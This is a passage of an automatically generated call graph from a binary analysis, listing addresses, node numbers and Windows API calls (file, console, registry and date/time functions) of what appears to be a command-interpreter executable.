17976->17982 17977 7ff789bd3448 166 API calls 17977->17978 17978->17783 17981 7ff789be7a23 17979->17981 17980->17967 17983 7ff789be778c 166 API calls 17981->17983 17982->17976 17983->17985 17984->17977 18582 7ff789be7730 17985->18582 17987 7ff789bd363c _vsnwprintf 17986->17987 17988 7ff789bd347b 17987->17988 17989 7ff789bd34a0 166 API calls 17988->17989 17990 7ff789bd3491 17989->17990 17990->17783 17992 7ff789bec775 17991->17992 17999 7ff789bec7ab 17991->17999 17993 7ff789bccd90 166 API calls 17992->17993 17995 7ff789bec781 17993->17995 17994 7ff789bec8d4 17994->17783 17995->17994 17996 7ff789bcb0d8 194 API calls 17995->17996 17996->17994 17997 7ff789bcb6b0 170 API calls 17997->17999 17998 7ff789bcb038 _dup2 17998->17999 17999->17994 17999->17995 17999->17997 17999->17998 18000 7ff789bcd208 _close 17999->18000 18000->17999 18003 7ff789beea0f 18001->18003 18004 7ff789bee9d9 18001->18004 18002 7ff789beea67 18606 7ff789bec978 18002->18606 18003->18002 18005 7ff789bcaf98 2 API calls 18003->18005 18593 7ff789bc6a48 18004->18593 18005->18003 18008 7ff789beea6c 18009 7ff789beeaae 18008->18009 18012 7ff789bcd208 _close 18008->18012 18010 7ff789beeacf 18009->18010 18616 7ff789bd3a0c 18009->18616 18012->18008 18014 7ff789bed63d 18013->18014 18020 7ff789bed635 18013->18020 18015 7ff789bed64a 18014->18015 18016 7ff789bed658 18014->18016 18017 7ff789bc3278 166 API calls 18015->18017 18016->18020 18021 7ff789bc3278 166 API calls 18016->18021 18017->18020 18018 7ff789bed672 longjmp 18019 7ff789bdc9da 18018->18019 18019->17758 18019->17760 18020->18018 18020->18019 18021->18020 18023 7ff789bd2724 18022->18023 18024 7ff789bd272d 18022->18024 18023->18024 18025 7ff789bd27ef _wcsicmp 18023->18025 18026 7ff789bd274b 18023->18026 18024->17843 18025->18026 18027 7ff789bd2817 CreateFileW 18026->18027 18028 7ff789bd2779 CreateFileW 18026->18028 18027->18028 18030 7ff789bd2796 _open_osfhandle 18027->18030 18028->18030 18031 7ff789bde2f0 GetLastError 18028->18031 18032 7ff789bd2863 18030->18032 18033 7ff789bd27b6 18030->18033 18031->18024 18051 7ff789bd01b8 _get_osfhandle GetFileType 18032->18051 18033->17843 18036 7ff789bd2872 GetFileSize 18036->18033 18037 7ff789bd2895 SetFilePointer 18036->18037 18038 7ff789bd28d2 ReadFile 18037->18038 18039 7ff789bde31a GetLastError 18037->18039 18040 7ff789bde362 SetFilePointer 18038->18040 18041 7ff789bd2901 18038->18041 18039->18038 18042 7ff789bde334 18039->18042 18045 7ff789bde38e SetFilePointer 18040->18045 18041->18033 18041->18045 18043 7ff789bde34d CloseHandle 18042->18043 18044 7ff789bde339 _close 18042->18044 18043->18024 18044->18024 18045->18033 18049 7ff789bef1e8 18047->18049 18048 7ff789bef220 18048->17850 18049->18048 18050 7ff789bc3278 166 API calls 18049->18050 18050->18048 18054 7ff789bd0200 18051->18054 18055 7ff789bd01eb 18051->18055 18052 7ff789bd0212 GetStdHandle 18053 7ff789bd0221 AcquireSRWLockShared GetConsoleMode ReleaseSRWLockShared 18052->18053 18053->18055 18054->18052 18054->18053 18054->18055 18055->18033 18055->18036 18057 7ff789bce60f 18056->18057 18114 7ff789bcef40 18057->18114 18059 7ff789bce626 18060 7ff789bdccca longjmp 18059->18060 18061 7ff789bce637 18059->18061 18060->18061 18061->18061 18062 7ff789bd3448 166 API calls 18061->18062 18063 7ff789bce65f 18061->18063 18064 7ff789bdccfe 18062->18064 18063->17863 18064->17863 18066 7ff789bcd267 18065->18066 18071 7ff789bcd2d3 18065->18071 18067 7ff789bcd284 _wcsicmp 18066->18067 18072 7ff789bcd2a6 18066->18072 18068 7ff789bcd32b 18067->18068 18067->18072 18070 7ff789bce600 473 API calls 18068->18070 18068->18072 18069 7ff789bce600 473 API calls 18069->18071 18070->18068 18071->18066 18071->18069 18073 7ff789bcd305 18071->18073 18074 7ff789bcd316 18072->18074 18075 7ff789bcef40 472 API calls 18072->18075 18073->18074 18076 7ff789bce600 473 API calls 18073->18076 18074->17866 18074->17871 18082 7ff789bcedf8 18075->18082 18076->18066 18077 7ff789bdd0a2 longjmp 18078 7ff789bdd0c5 18077->18078 18079 7ff789bd3448 166 API calls 18078->18079 18080 7ff789bdd0d4 18079->18080 18081 7ff789bceece 18081->18074 18085 7ff789bccd90 166 API calls 18081->18085 18082->18077 18082->18078 18083 7ff789bcee68 18082->18083 18090 7ff789bceeb1 18082->18090 18084 7ff789bcef40 472 API calls 18083->18084 18084->18074 18086 7ff789bceee7 18085->18086 18088 7ff789bceeef 18086->18088 18089 7ff789bcef31 18086->18089 18087 7ff789bce600 473 API calls 18087->18090 18091 7ff789bce600 473 API calls 18088->18091 18092 7ff789bee91c 198 API calls 18089->18092 18090->18081 18090->18087 18093 7ff789bceec2 18090->18093 18091->18074 18094 7ff789bcef36 18092->18094 18095 7ff789bcef40 472 API calls 18093->18095 18094->18077 18095->18081 18109 7ff789bed419 18096->18109 18097 7ff789bdcadf 18098 7ff789bed576 18099 7ff789bed592 18098->18099 18110 7ff789bed555 18098->18110 18100 7ff789bd3448 166 API calls 18099->18100 18104 7ff789bed5a5 18100->18104 18101 7ff789bed5c4 18102 7ff789bd3448 166 API calls 18101->18102 18102->18097 18107 7ff789bed5ba 18104->18107 18111 7ff789bd3448 166 API calls 18104->18111 18105 7ff789bed541 18105->18099 18106 7ff789bed546 18105->18106 18106->18101 18106->18110 18448 7ff789bed36c 18107->18448 18108 7ff789bd3448 166 API calls 18108->18109 18109->18097 18109->18098 18109->18099 18109->18101 18109->18105 18109->18108 18109->18110 18113 7ff789bed3fc 166 API calls 18109->18113 18455 7ff789bed31c 18110->18455 18111->18107 18113->18109 18115 7ff789bcef71 18114->18115 18116 7ff789bdd1f3 18115->18116 18117 7ff789bcf130 18115->18117 18126 7ff789bcef87 18115->18126 18116->18059 18118 7ff789bd3448 166 API calls 18117->18118 18122 7ff789bcf046 18117->18122 18118->18122 18119 7ff789bcf433 18146 7ff789bcf8c0 EnterCriticalSection LeaveCriticalSection 18119->18146 18121 7ff789bcf438 18121->18122 18199 7ff789bcf860 18121->18199 18122->18059 18127 7ff789bcf0c4 iswdigit 18122->18127 18128 7ff789bcf1fc iswdigit 18122->18128 18129 7ff789bcf1b7 iswspace 18122->18129 18131 7ff789bcf558 iswspace 18122->18131 18133 7ff789bcf860 456 API calls 18122->18133 18134 7ff789bcf8c0 456 API calls 18122->18134 18135 7ff789bdd1df 18122->18135 18136 7ff789bcf860 456 API calls 18122->18136 18141 7ff789bcf32f iswspace 18122->18141 18142 7ff789bcf2b8 iswdigit 18122->18142 18144 7ff789bcf3d2 iswspace 18122->18144 18123 7ff789bceff2 iswspace 18125 7ff789bcf01f wcschr 18123->18125 18123->18126 18125->18122 18126->18116 18126->18119 18126->18121 18126->18122 18126->18123 18126->18125 18127->18122 18128->18122 18129->18127 18130 7ff789bcf1ce wcschr 18129->18130 18130->18127 18130->18128 18131->18122 18132 7ff789bcf6cd wcschr 18131->18132 18132->18122 18133->18122 18134->18122 18137 7ff789bc3278 166 API calls 18135->18137 18138 7ff789bcf632 iswspace 18136->18138 18137->18116 18138->18122 18139 7ff789bcf648 wcschr 18138->18139 18139->18122 18140 7ff789bcf65f iswdigit 18139->18140 18140->18122 18141->18122 18143 7ff789bcf342 wcschr 18141->18143 18142->18122 18143->18122 18143->18142 18144->18122 18145 7ff789bcf3e9 wcschr 18144->18145 18145->18122 18170 7ff789bcf934 18146->18170 18147 7ff789bcf94a EnterCriticalSection LeaveCriticalSection 18151 7ff789bcf994 _get_osfhandle 18147->18151 18147->18170 18148 7ff789bcfb46 18213 7ff789bcfc30 GetProcessHeap HeapAlloc 18148->18213 18149 7ff789bc3240 166 API calls 18149->18170 18150 7ff789bebfec 176 API calls 18150->18170 18204 7ff789bd0010 SetFilePointer 18151->18204 18155 7ff789bcfb52 18155->18121 18156 7ff789bdd3fa EnterCriticalSection LeaveCriticalSection longjmp 18156->18170 18157 7ff789bcfbe6 GetLastError 18175 7ff789bcfa42 18157->18175 18158 7ff789bdd388 _get_osfhandle 18160 7ff789bd0010 9 API calls 18158->18160 18159 7ff789bd01b8 6 API calls 18159->18170 18160->18170 18161 7ff789bdd3b6 GetLastError 18161->18170 18161->18175 18162 7ff789bee9b4 197 API calls 18163 7ff789bdd474 longjmp 18162->18163 18163->18170 18164 7ff789bdd2ac 18249 7ff789bebf2c _get_osfhandle 18164->18249 18165 7ff789bdd2c7 EnterCriticalSection LeaveCriticalSection _get_osfhandle 18254 7ff789be7f00 GetStdHandle 18165->18254 18168 7ff789bcfa80 wcschr 18168->18170 18169 7ff789bdd32e GetLastError 18169->18170 18170->18147 18170->18148 18170->18149 18170->18150 18170->18151 18170->18156 18170->18157 18170->18158 18170->18159 18170->18161 18170->18162 18170->18164 18170->18165 18170->18168 18170->18169 18171 7ff789bd3448 166 API calls 18170->18171 18172 7ff789bd3448 166 API calls 18170->18172 18174 7ff789bcfbd4 18170->18174 18170->18175 18176 7ff789bcfaf0 18170->18176 18248 7ff789bef318 _get_osfhandle GetFileType 18170->18248 18173 7ff789bdd34d longjmp 18171->18173 18172->18170 18173->18170 18174->18148 18182 7ff789bcfbe1 18174->18182 18175->18121 18177 7ff789bd01b8 6 API calls 18176->18177 18178 7ff789bcfb0a 18177->18178 18178->18148 18181 7ff789bcfb0e _get_osfhandle SetFilePointer 18178->18181 18179 7ff789bdd4ee 18180 7ff789bc3278 166 API calls 18179->18180 18185 7ff789bdd4fb 18180->18185 18181->18148 18186 7ff789bdd533 18181->18186 18182->18179 18183 7ff789bdd4dd 18182->18183 18187 7ff789bebfec 176 API calls 18182->18187 18184 7ff789bc3278 166 API calls 18183->18184 18189 7ff789bdd4e9 18184->18189 18190 7ff789bdd514 longjmp 18185->18190 18193 7ff789bd01b8 6 API calls 18185->18193 18186->18148 18293 7ff789bd34a0 18186->18293 18188 7ff789bdd4c9 18187->18188 18191 7ff789bd3448 166 API calls 18188->18191 18192 7ff789bee91c 198 API calls 18189->18192 18190->18175 18194 7ff789bdd4d1 18191->18194 18192->18179 18196 7ff789bdd50b 18193->18196 18197 7ff789bd3448 166 API calls 18194->18197 18196->18190 18285 7ff789bef4a8 18196->18285 18197->18183 18200 7ff789bcf871 18199->18200 18201 7ff789bcf8c0 456 API calls 18200->18201 18202 7ff789bcf881 18200->18202 18203 7ff789bdd203 18201->18203 18202->18122 18205 7ff789bd0062 AcquireSRWLockShared ReadFile ReleaseSRWLockShared 18204->18205 18206 7ff789bd005d 18204->18206 18207 7ff789bd0190 18205->18207 18208 7ff789bd00bb 18205->18208 18206->18205 18207->18170 18208->18207 18209 7ff789bd0167 MultiByteToWideChar 18208->18209 18210 7ff789bdd6db AcquireSRWLockShared ReadFile ReleaseSRWLockShared 18208->18210 18211 7ff789bd0131 SetFilePointer 18208->18211 18209->18207 18210->18207 18211->18208 18214 7ff789bdd55c 18213->18214 18215 7ff789bcfc6a 18213->18215 18216 7ff789bc3278 166 API calls 18214->18216 18217 7ff789bdd571 memset longjmp 18215->18217 18230 7ff789bcfca2 18215->18230 18218 7ff789bdd566 18216->18218 18219 7ff789bcfce7 18217->18219 18218->18217 18219->18155 18220 7ff789bcfd73 18221 7ff789bdd638 18220->18221 18222 7ff789bcfd99 18220->18222 18223 7ff789bc3278 166 API calls 18221->18223 18224 7ff789bcff70 2 API calls 18222->18224 18225 7ff789bdd64c 18223->18225 18226 7ff789bcfda1 18224->18226 18227 7ff789bcff70 2 API calls 18225->18227 18226->18155 18228 7ff789bdd654 longjmp 18227->18228 18232 7ff789bcff4f 18228->18232 18230->18219 18230->18220 18230->18232 18233 7ff789bdd609 18230->18233 18238 7ff789bdd5b5 memmove 18230->18238 18316 7ff789bd18d4 18230->18316 18390 7ff789bcd840 GetProcessHeap HeapAlloc 18230->18390 18234 7ff789bd0167 MultiByteToWideChar 18232->18234 18235 7ff789bdd6db AcquireSRWLockShared ReadFile ReleaseSRWLockShared 18232->18235 18237 7ff789bd0131 SetFilePointer 18232->18237 18236 7ff789bc3278 166 API calls 18233->18236 18242 7ff789bd0190 18234->18242 18235->18242 18240 7ff789bdd615 18236->18240 18237->18232 18243 7ff789bc3278 166 API calls 18238->18243 18241 7ff789bcff70 2 API calls 18240->18241 18244 7ff789bdd61f longjmp 18241->18244 18242->18155 18245 7ff789bdd5e6 18243->18245 18244->18221 18246 7ff789bcff70 2 API calls 18245->18246 18247 7ff789bdd5f0 longjmp 18246->18247 18247->18233 18248->18170 18421 7ff789be8450 GetFileType 18249->18421 18252 7ff789bebf6b GetLastError 18253 7ff789bebf62 18253->18175 18255 7ff789be7f6b 18254->18255 18256 7ff789be7f59 _get_osfhandle 18254->18256 18257 7ff789be83df AcquireSRWLockShared ReadConsoleW ReleaseSRWLockShared 18255->18257 18260 7ff789be7f97 GetConsoleScreenBufferInfo 18255->18260 18256->18255 18258 7ff789be80f6 18257->18258 18259 7ff789bd8f80 7 API calls 18258->18259 18261 7ff789be8432 18259->18261 18260->18257 18262 7ff789be7fb2 18260->18262 18261->18170 18427 7ff789bf1398 18262->18427 18264 7ff789be7ff8 AcquireSRWLockShared ReadConsoleW ReleaseSRWLockShared 18281 7ff789be7fe0 18264->18281 18266 7ff789be80d1 18266->18258 18267 7ff789be80d6 GetProcessHeap RtlFreeHeap 18266->18267 18267->18258 18268 7ff789be8061 GetProcessHeap RtlFreeHeap 18268->18281 18270 7ff789be8168 _wcsnicmp 18271 7ff789be818b _wcsnicmp 18270->18271 18270->18281 18272 7ff789be81ae _wcsnicmp 18271->18272 18271->18281 18273 7ff789be81cd _wcsnicmp 18272->18273 18272->18281 18275 7ff789be81ec _wcsnicmp 18273->18275 18273->18281 18277 7ff789be820b _wcsnicmp 18275->18277 18275->18281 18279 7ff789be822a _wcsnicmp 18277->18279 18277->18281 18278 7ff789be82a1 SetConsoleCursorPosition FillConsoleOutputCharacterW WriteConsoleW 18282 7ff789bd0580 12 API calls 18278->18282 18279->18281 18281->18264 18281->18266 18281->18268 18281->18270 18283 7ff789be8364 GetProcessHeap RtlFreeHeap 18281->18283 18284 7ff789be8391 GetProcessHeap HeapAlloc 18281->18284 18432 7ff789bd58e4 EnterCriticalSection LeaveCriticalSection 18281->18432 18433 7ff789bf10d8 18281->18433 18444 7ff789bef22c _get_osfhandle GetConsoleMode 18281->18444 18282->18281 18283->18281 18284->18258 18284->18281 18286 7ff789bef4c1 GetStdHandle 18285->18286 18287 7ff789be8450 367 API calls 18286->18287 18288 7ff789bef4ea 18287->18288 18289 7ff789bef4ee wcschr 18288->18289 18290 7ff789bef509 18288->18290 18289->18286 18289->18290 18291 7ff789bd8f80 7 API calls 18290->18291 18292 7ff789bef519 18291->18292 18292->18190 18294 7ff789bd34bf 18293->18294 18315 7ff789bd34f5 18293->18315 18295 7ff789bd3578 6 API calls 18294->18295 18296 7ff789bd34c9 18295->18296 18297 7ff789bd350d AcquireSRWLockShared _get_osfhandle WriteConsoleW 18296->18297 18298 7ff789bd34cd 18296->18298 18300 7ff789bde8d2 GetLastError 18297->18300 18301 7ff789bd3557 ReleaseSRWLockShared 18297->18301 18299 7ff789bd36ec 6 API calls 18298->18299 18302 7ff789bd34e1 18299->18302 18303 7ff789bde8e5 GetLastError 18300->18303 18301->18302 18302->18303 18302->18315 18304 7ff789bd01b8 6 API calls 18303->18304 18305 7ff789bde904 18304->18305 18306 7ff789bde918 18305->18306 18307 7ff789bde908 18305->18307 18447 7ff789bef318 _get_osfhandle GetFileType 18306->18447 18308 7ff789bc3278 160 API calls 18307->18308 18308->18315 18310 7ff789bde91f 18311 7ff789bde923 18310->18311 18312 7ff789bde931 18310->18312 18313 7ff789bc3278 160 API calls 18311->18313 18314 7ff789bef1d8 160 API calls 18312->18314 18313->18315 18314->18315 18315->18148 18317 7ff789bd1935 18316->18317 18318 7ff789bd193b 18316->18318 18317->18318 18319 7ff789bd19a1 18317->18319 18320 7ff789bd195a 18318->18320 18321 7ff789bd1946 wcsrchr 18318->18321 18322 7ff789bddbda 18319->18322 18323 7ff789bd2e44 memset malloc 18319->18323 18325 7ff789bd8f80 7 API calls 18320->18325 18321->18320 18322->18320 18324 7ff789bddbdf longjmp 18322->18324 18346 7ff789bddccd 18322->18346 18345 7ff789bd19cf 18323->18345 18326 7ff789bddbf3 ??_V@YAXPEAX 18324->18326 18327 7ff789bd1978 18325->18327 18328 7ff789bddbff ??_V@YAXPEAX 18326->18328 18327->18230 18328->18320 18329 7ff789bd1a21 18332 7ff789bddc3c wcschr 18329->18332 18333 7ff789bd1a3c wcsrchr 18329->18333 18339 7ff789bd1dfe 18329->18339 18330 7ff789bd19f3 towlower wcsrchr 18330->18329 18331 7ff789bd1af6 wcsrchr 18330->18331 18336 7ff789bd1b11 towlower 18331->18336 18331->18339 18334 7ff789bddcd2 18332->18334 18335 7ff789bddc5d 18332->18335 18337 7ff789bd1a54 wcsrchr 18333->18337 18333->18339 18334->18328 18341 7ff789bc3278 166 API calls 18334->18341 18338 7ff789bccd90 166 API calls 18335->18338 18336->18339 18336->18345 18337->18334 18340 7ff789bd1a71 18337->18340 18351 7ff789bddc75 18338->18351 18339->18332 18339->18334 18344 7ff789bd1a95 18340->18344 18348 7ff789bcb900 166 API calls 18340->18348 18343 7ff789bddcef longjmp 18341->18343 18342 7ff789bd1d74 18342->18320 18352 7ff789bd1d7d ??_V@YAXPEAX 18342->18352 18347 7ff789bddd03 18343->18347 18344->18322 18344->18342 18349 7ff789bd1b64 18344->18349 18350 7ff789bd1acf 18344->18350 18345->18322 18345->18329 18345->18330 18345->18339 18346->18328 18353 7ff789bddd3b 18347->18353 18354 7ff789bddd0c SearchPathW 18347->18354 18348->18344 18349->18347 18357 7ff789bd1b76 GetFullPathNameW 18349->18357 18355 7ff789bcb900 166 API calls 18350->18355 18351->18322 18356 7ff789bd3a90 170 API calls 18351->18356 18352->18320 18363 7ff789bddd5c wcsrchr 18353->18363 18354->18353 18358 7ff789bd1ad7 ??_V@YAXPEAX 18355->18358 18359 7ff789bddc98 18356->18359 18360 7ff789bd2978 13 API calls 18357->18360 18358->18320 18361 7ff789bcff70 GetProcessHeap RtlFreeHeap 18359->18361 18362 7ff789bd1ba7 wcsrchr 18360->18362 18361->18322 18362->18363 18364 7ff789bd1bc9 18362->18364 18365 7ff789bddd73 18363->18365 18364->18342 18366 7ff789bd1bda memset 18364->18366 18367 7ff789bddd8c 18365->18367 18368 7ff789bddd78 longjmp 18365->18368 18369 7ff789bcca40 17 API calls 18366->18369 18367->18326 18367->18328 18368->18367 18370 7ff789bd1c23 18369->18370 18370->18365 18371 7ff789bddda8 GetFileAttributesExW 18370->18371 18384 7ff789bd1c4f 18370->18384 18372 7ff789bddfd0 18371->18372 18374 7ff789bdddc5 18371->18374 18372->18230 18373 7ff789bcb900 166 API calls 18375 7ff789bd1d52 18373->18375 18376 7ff789bddf34 18374->18376 18380 7ff789be85d0 8 API calls 18374->18380 18375->18342 18379 7ff789bd1d68 ??_V@YAXPEAX 18375->18379 18381 7ff789bddf4d 18376->18381 18376->18384 18377 7ff789bd1d09 18377->18373 18378 7ff789bde035 18377->18378 18379->18342 18382 7ff789bdde3f 18380->18382 18383 7ff789bf08ec 9 API calls 18381->18383 18386 7ff789bc6ee4 166 API calls 18382->18386 18383->18372 18384->18339 18384->18377 18385 7ff789bd1cd8 wcsrchr 18384->18385 18385->18378 18387 7ff789bd1cf5 18385->18387 18388 7ff789bddeb6 18386->18388 18387->18339 18387->18377 18389 7ff789bd3140 166 API calls 18388->18389 18389->18376 18391 7ff789bcd8b5 18390->18391 18392 7ff789bcdefa 18390->18392 18393 7ff789bcdf04 18391->18393 18398 7ff789bcd8e5 18391->18398 18394 7ff789bc3278 166 API calls 18392->18394 18395 7ff789bcdf15 longjmp 18393->18395 18418 7ff789bcda67 18393->18418 18394->18393 18395->18418 18396 7ff789bcff70 GetProcessHeap RtlFreeHeap 18397 7ff789bcdf34 18396->18397 18399 7ff789bcff70 GetProcessHeap RtlFreeHeap 18397->18399 18400 7ff789bcdeb6 18398->18400 18401 7ff789bcd94d GetProcessHeap HeapAlloc 18398->18401 18398->18418 18402 7ff789bcdf3c 18399->18402 18403 7ff789bc3278 166 API calls 18400->18403 18401->18400 18410 7ff789bcd97c 18401->18410 18402->18230 18404 7ff789bcdec5 18403->18404 18405 7ff789bcdeda longjmp 18404->18405 18404->18418 18405->18418 18406 7ff789bd081c 166 API calls 18406->18410 18407 7ff789bcdbce wcstol 18407->18410 18408 7ff789bcdaa9 18409 7ff789bcde4a 18408->18409 18415 7ff789bcdaf3 18408->18415 18408->18418 18411 7ff789bc3278 166 API calls 18409->18411 18409->18418 18410->18404 18410->18406 18410->18407 18410->18408 18410->18410 18413 7ff789bcdc43 18410->18413 18410->18418 18412 7ff789bcde69 longjmp 18411->18412 18412->18418 18414 7ff789bcdc52 wcstol 18413->18414 18413->18418 18414->18418 18416 7ff789bcdb80 _wcsnicmp 18415->18416 18415->18418 18416->18415 18417 7ff789bcdd0f 18416->18417 18419 7ff789bcdd30 memmove 18417->18419 18420 7ff789bcde97 memmove 18417->18420 18418->18396 18419->18418 18420->18400 18422 7ff789be8491 18421->18422 18423 7ff789be8498 18421->18423 18425 7ff789be7f00 357 API calls 18422->18425 18424 7ff789bd0010 9 API calls 18423->18424 18426 7ff789be8496 18424->18426 18425->18426 18426->18252 18426->18253 18428 7ff789bf13f3 18427->18428 18429 7ff789bf13ac 18427->18429 18428->18281 18430 7ff789bf13d8 free 18429->18430 18431 7ff789bf13bf free 18429->18431 18430->18428 18431->18430 18431->18431 18434 7ff789bccd90 166 API calls 18433->18434 18437 7ff789bf110b 18434->18437 18435 7ff789bf1360 18435->18281 18436 7ff789bf1240 memmove 18440 7ff789bf1289 18436->18440 18437->18435 18437->18436 18441 7ff789bf11d5 wcschr 18437->18441 18443 7ff789bf1138 18437->18443 18438 7ff789bcff70 GetProcessHeap RtlFreeHeap 18438->18435 18442 7ff789bf0c90 309 API calls 18440->18442 18441->18437 18442->18443 18443->18438 18445 7ff789be828a GetConsoleScreenBufferInfo 18444->18445 18446 7ff789bef259 _get_osfhandle SetConsoleMode 18444->18446 18445->18278 18446->18445 18447->18310 18449 7ff789bed381 18448->18449 18450 7ff789bed3d8 18448->18450 18451 7ff789bd34a0 166 API calls 18449->18451 18453 7ff789bed390 18451->18453 18452 7ff789bd3448 166 API calls 18452->18453 18453->18450 18453->18452 18454 7ff789bd34a0 166 API calls 18453->18454 18454->18453 18456 7ff789bd3448 166 API calls 18455->18456 18457 7ff789bed33b 18456->18457 18458 7ff789bed36c 166 API calls 18457->18458 18459 7ff789bed343 18458->18459 18460 7ff789bed3fc 166 API calls 18459->18460 18462 7ff789bed34e 18460->18462 18461 7ff789bed576 18463 7ff789bed555 18461->18463 18464 7ff789bed592 18461->18464 18462->18461 18462->18463 18462->18464 18466 7ff789bed5c4 18462->18466 18470 7ff789bed541 18462->18470 18472 7ff789bd3448 166 API calls 18462->18472 18476 7ff789bed5c2 18462->18476 18477 7ff789bed3fc 166 API calls 18462->18477 18468 7ff789bed31c 166 API calls 18463->18468 18465 7ff789bd3448 166 API calls 18464->18465 18469 7ff789bed5a5 18465->18469 18467 7ff789bd3448 166 API calls 18466->18467 18467->18476 18468->18476 18471 7ff789bed5ba 18469->18471 18474 7ff789bd3448 166 API calls 18469->18474 18470->18464 18473 7ff789bed546 18470->18473 18475 7ff789bed36c 166 API calls 18471->18475 18472->18462 18473->18463 18473->18466 18474->18471 18475->18476 18476->18097 18477->18462 18479 7ff789bc745f 18478->18479 18480 7ff789bc7468 18478->18480 18479->18480 18481 7ff789bc7497 _wcsicmp 18479->18481 18482 7ff789be48c8 _wcsicmp 18479->18482 18480->17885 18480->17890 18483 7ff789bd1ea0 8 API calls 18481->18483 18485 7ff789be48ed CreateFileW 18482->18485 18484 7ff789bc74bd 18483->18484 18484->18485 18486 7ff789bc74c9 CreateFileW 18484->18486 18485->18486 18487 7ff789be4929 18485->18487 18488 7ff789be4943 GetLastError 18486->18488 18489 7ff789bc7501 _open_osfhandle 18486->18489 18487->18489 18488->18480 18489->18480 18490 7ff789bc7520 CloseHandle 18489->18490 18490->18480 18492->17888 18495 7ff789bebf99 18494->18495 18497 7ff789bebfb5 18494->18497 18496 7ff789bd9324 malloc 18495->18496 18496->18497 18497->17923 18497->17936 18497->17949 18499 7ff789bd3421 18498->18499 18500 7ff789bd3433 18498->18500 18569 7ff789bd3684 _vsnwprintf 18499->18569 18500->17783 18571 7ff789bc58d4 RegOpenKeyExW 18502->18571 18505 7ff789bd33f0 _vsnwprintf 18506 7ff789bc58c2 18505->18506 18506->17949 18507->17949 18509 7ff789bc6f30 GetSystemTime SystemTimeToFileTime FileTimeToLocalFileTime FileTimeToSystemTime 18508->18509 18529 7ff789bc6fbf 18508->18529 18510 7ff789bc6f90 18509->18510 18514 7ff789be42b6 18509->18514 18574 7ff789bd5508 GetUserDefaultLangID 18510->18574 18515 7ff789be4322 realloc 18514->18515 18516 7ff789be433f 18514->18516 18520 7ff789bc3278 153 API calls 18514->18520 18515->18514 18515->18516 18517 7ff789bd33f0 _vsnwprintf 18516->18517 18525 7ff789be437d 18517->18525 18518 7ff789bd5508 GetUserDefaultLangID 18519 7ff789bc7042 GetDateFormatW 18518->18519 18521 7ff789bc707a 18519->18521 18520->18514 18522 7ff789bd5508 GetUserDefaultLangID 18521->18522 18530 7ff789bc708a 18521->18530 18523 7ff789bc714a GetDateFormatW 18522->18523 18526 7ff789be42a0 GetLastError 18523->18526 18527 7ff789bc7175 realloc 18523->18527 18524 7ff789be427f memmove 18524->18529 18533 7ff789be43ea 18525->18533 18536 7ff789be43fb 18525->18536 18526->18514 18527->18514 18528 7ff789bc719c 18527->18528 18531 7ff789bd5508 GetUserDefaultLangID 18528->18531 18529->18518 18529->18524 18529->18529 18532 7ff789bc7020 memmove 18529->18532 18576 7ff789be8654 18529->18576 18530->18525 18539 7ff789bc70bd 18530->18539 18534 7ff789bc71ae GetDateFormatW 18531->18534 18532->18529 18535 7ff789bd3448 153 API calls 18533->18535 18534->18526 18534->18529 18538 7ff789be43f9 18535->18538 18537 7ff789bd3448 153 API calls 18536->18537 18537->18538 18539->18538 18539->18539 18540 7ff789bd8f80 7 API calls 18539->18540 18541 7ff789bc7129 18540->18541 18541->17949 18543 7ff789bd3184 GetSystemTime SystemTimeToFileTime FileTimeToLocalFileTime FileTimeToSystemTime 18542->18543 18544 7ff789bde59e 18542->18544 18545 7ff789bd31e0 18543->18545 18546 7ff789bde5ed 18543->18546 18547 7ff789be8654 9 API calls 18544->18547 18550 7ff789bd31ff 18545->18550 18551 7ff789bde5a8 18545->18551 18548 7ff789bde750 18546->18548 18549 7ff789bde5fe 18546->18549 18547->18551 18556 7ff789bd33f0 _vsnwprintf 18548->18556 18553 7ff789bd5508 GetUserDefaultLangID 18549->18553 18554 7ff789bd33f0 _vsnwprintf 18550->18554 18552 7ff789bd3448 159 API calls 18551->18552 18562 7ff789bde5e8 18552->18562 18555 7ff789bde606 GetLocaleInfoW 18553->18555 18557 7ff789bd3247 18554->18557 18566 7ff789bde629 18555->18566 18563 7ff789bde748 18556->18563 18557->18557 18558 7ff789bd8f80 7 API calls 18557->18558 18560 7ff789bd3266 18558->18560 18559 7ff789bde711 18561 7ff789bd5508 GetUserDefaultLangID 18559->18561 18560->17949 18564 7ff789bde716 GetTimeFormatW 18561->18564 18562->18562 18563->18562 18565 7ff789bd34a0 159 API calls 18563->18565 18564->18563 18565->18562 18566->18559 18567 7ff789bde6e7 memmove 18566->18567 18567->18566 18570 7ff789bd36b7 18569->18570 18570->18500 18572 7ff789bc5913 RegQueryValueExW RegCloseKey 18571->18572 18573 7ff789bc588c 18571->18573 18572->18573 18573->18505 18575 7ff789bc6f97 GetLocaleInfoW 18574->18575 18575->18529 18577 7ff789be8686 18576->18577 18578 7ff789be8673 GetSystemTime 18576->18578 18579 7ff789be86cc SystemTimeToFileTime 18577->18579 18578->18579 18580 7ff789bd8f80 7 API calls 18579->18580 18581 7ff789be86ed 18580->18581 18581->18529 18585 7ff789be773c 18582->18585 18583 7ff789be777d 18583->17978 18584 7ff789bd3448 166 API calls 18584->18585 18585->18583 18585->18584 18587 7ff789be778c 166 API calls 18586->18587 18588 7ff789be76fb 18587->18588 18589 7ff789be771c 18588->18589 18590 7ff789bd3448 166 API calls 18588->18590 18589->17978 18591 7ff789be7711 18590->18591 18592 7ff789be778c 166 API calls 18591->18592 18592->18589 18594 7ff789bc6b23 18593->18594 18595 7ff789bc6a51 18593->18595 18594->18003 18595->18594 18596 7ff789be417c 18595->18596 18597 7ff789bc6ab2 18595->18597 18598 7ff789beec14 173 API calls 18596->18598 18599 7ff789bd3c24 166 API calls 18597->18599 18600 7ff789be4190 18598->18600 18601 7ff789bc6abf GetProcessHeap RtlFreeHeap 18599->18601 18622 7ff789bc6b84 SetEnvironmentStringsW GetProcessHeap RtlFreeHeap 18601->18622 18607 7ff789beca9e 18606->18607 18608 7ff789bec98e 18606->18608 18607->18008 18609 7ff789beee4c TerminateProcess GetLastError 18608->18609 18615 7ff789bec9b3 18608->18615 18609->18608 18610 7ff789bd5cb4 7 API calls 18610->18615 18611 7ff789beca21 _get_osfhandle FlushFileBuffers 18613 7ff789bcb038 _dup2 18611->18613 18612 7ff789bcd208 _close 18612->18615 18613->18615 18614 7ff789bcb038 _dup2 18614->18615 18615->18607 18615->18610 18615->18611 18615->18612 18615->18614 18617 7ff789bd3a53 FindClose 18616->18617 18621 7ff789bd3a25 18616->18621 18618 7ff789bd3a74 GetLastError 18617->18618 18619 7ff789bd3a66 18617->18619 18618->18619 